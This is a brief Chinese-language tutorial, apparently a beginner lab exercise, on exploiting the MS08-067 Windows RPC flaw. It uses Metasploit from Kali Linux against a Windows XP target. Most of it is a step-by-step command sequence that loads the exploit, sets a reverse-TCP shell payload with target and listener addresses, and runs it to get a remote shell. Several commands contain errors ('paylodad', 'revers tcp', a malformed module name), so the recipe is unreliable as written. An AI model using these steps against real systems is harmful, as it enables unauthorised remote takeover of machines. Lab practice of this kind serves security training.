一、漏洞介紹
如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。在 Microsoft windows 2000、Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證即可利用此漏洞運行任意代碼。此漏洞可能用于進行蠕蟲攻擊。 防火墻最佳做法和標準的默認防火墻配置有助于保護網絡資源免受從企業外部發起的攻擊。可以通過安裝本 Microsoft 更新程序來保護計算機不受侵害。安裝后,可能必須重新啟動計算機。
嚴重等級:Windows 2000;XP;Server 2003為嚴重,Windows Vista;Server 2008;7 Beta為重要。
二、資源裝備
1.安裝好Kali linux的虛擬機一臺;
2.Windows xp 計算機一臺。
3.整裝待發的小白一個。
三、攻防實戰
2.1 在kali中啟動MSF。
打開終端 鍵入命令:msfconsole
2.2 配置相關參數
①鍵入命令:search ms08-067
②復制msf返回的命令前加use:use exploit/windows/ms08-067 netapi
③設置payload: set paylodad windows/shell/revers tcp
④顯示需要配置的參數 :show options
⑤設置靶機(win xp)IP地址 set rhosts 192.168.xxx.xxx
⑥設置本機(kali) IP地址 set lhost 192.168.xxx.xxx
⑦設置靶機系統(可不設置) set targets xx(xx為靶機系統編號)
2.3 運行payload,接受shell
鍵入命令:exploit ,片刻后即可回顯靶機shell